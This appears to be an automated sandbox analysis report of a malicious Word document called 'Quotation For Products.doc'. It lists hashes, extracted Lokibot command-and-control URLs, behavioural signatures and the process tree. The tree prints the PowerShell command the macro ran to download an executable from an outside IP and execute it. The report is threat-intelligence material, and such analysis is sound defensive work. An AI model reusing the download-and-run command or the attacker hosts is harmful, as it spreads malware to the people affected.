Analysis
- max time kernel: 107s
- max time network: 149s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-06-2021 03:40

Static task: static1
Behavioral task: behavioral1
- Sample: Quotation For Products.doc
- Resource: win7v20210410
General
- Target: Quotation For Products.doc
- Size: 416KB
- MD5: 3a99afd85fb1e4bda80f0a8bb2476616
- SHA1: 2398d29a7cd49968a3ea037821cf864579f20ce8
- SHA256: 2c44f76d882e07be44cb97ff736b54aa2e531ec45c4ad2fa51438824665f532f
- SHA512: 066b74b5a80ac126e71ec4be063f8a3aefd668bbda0f766821c660f961b71ec011c243da1eb3d5fa737e8d39bdeb81ceb190045e2777c14115f4e5cabc502022
Malware Config
Extracted
- http://31.210.20.45/1xBet/dgeApp17.exe
Extracted (lokibot)
- http://209.141.34.39/cap-01/pin.php
- http://kbfvzoboss.bid/alien/fre.php
- http://alphastand.trade/alien/fre.php
- http://alphastand.win/alien/fre.php
- http://alphastand.top/alien/fre.php
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2220 | 472 | powershell.exe | WINWORD.EXE
Downloads MZ/PE file

Executes dropped EXE (1 IoC)
Processes: bornskin.exe
  pid | process
  2112 | bornskin.exe
Suspicious use of SetThreadContext (1 IoC)
Processes: bornskin.exe
  description | pid | process | target process
  PID 3692 set thread context of 2112 | 3692 | bornskin.exe | bornskin.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  472 | WINWORD.EXE (x2)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, bornskin.exe
  pid | process
  2220 | powershell.exe (x3)
  3692 | bornskin.exe (x2)
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: powershell.exe, bornskin.exe
  description | pid | process
  Token: SeDebugPrivilege | 2220 | powershell.exe
  Token: SeDebugPrivilege | 3692 | bornskin.exe
  Token: SeDebugPrivilege | 2112 | bornskin.exe
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes: WINWORD.EXE
  pid | process
  472 | WINWORD.EXE (x7)
Suspicious use of WriteProcessMemory (14 IoCs)
Processes: WINWORD.EXE, powershell.exe, bornskin.exe
  description | pid | process | target process
  PID 472 wrote to memory of 2220 | 472 | WINWORD.EXE | powershell.exe (x2)
  PID 2220 wrote to memory of 3692 | 2220 | powershell.exe | bornskin.exe (x3)
  PID 3692 wrote to memory of 2112 | 3692 | bornskin.exe | bornskin.exe (x9)
Processes
- [1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quotation For Products.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/dgeApp17.exe" -Destination "C:\Users\Public\Documents\bornskin.exe";C:\Users\Public\Documents\bornskin.exe
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Public\Documents\bornskin.exe
      Command line: "C:\Users\Public\Documents\bornskin.exe"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Local\Temp\bornskin.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\bornskin.exe
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\AppData\Local\Temp\bornskin.exe
  MD5: 81f63c8e0fab4d42de5486e88aa5ac74
  SHA1: f3b3d2fb57e01af4bbcc356a71e8a5abe428491c
  SHA256: 2c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4
  SHA512: ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb
- memory/472-115-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmp (Filesize 64KB)
- memory/472-116-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmp (Filesize 64KB)
- memory/472-117-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmp (Filesize 64KB)
- memory/472-119-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmp (Filesize 64KB)
- memory/472-118-0x00007FFED5190000-0x00007FFED7CB3000-memory.dmp (Filesize 43.1MB)
- memory/472-122-0x00007FFED0020000-0x00007FFED110E000-memory.dmp (Filesize 16.9MB)
- memory/472-123-0x00007FFECD690000-0x00007FFECF585000-memory.dmp (Filesize 31.0MB)
- memory/472-114-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmp (Filesize 64KB)
- memory/2112-185-0x00000000004139DE-mapping.dmp
- memory/2112-188-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize 648KB)
- memory/2220-179-0x0000000000000000-mapping.dmp
- memory/2220-182-0x000002016B116000-0x000002016B118000-memory.dmp (Filesize 8KB)
- memory/2220-181-0x000002016B113000-0x000002016B115000-memory.dmp (Filesize 8KB)
- memory/2220-180-0x000002016B110000-0x000002016B112000-memory.dmp (Filesize 8KB)
- memory/3692-184-0x0000000005680000-0x0000000005681000-memory.dmp (Filesize 4KB)
- memory/3692-183-0x0000000000000000-mapping.dmp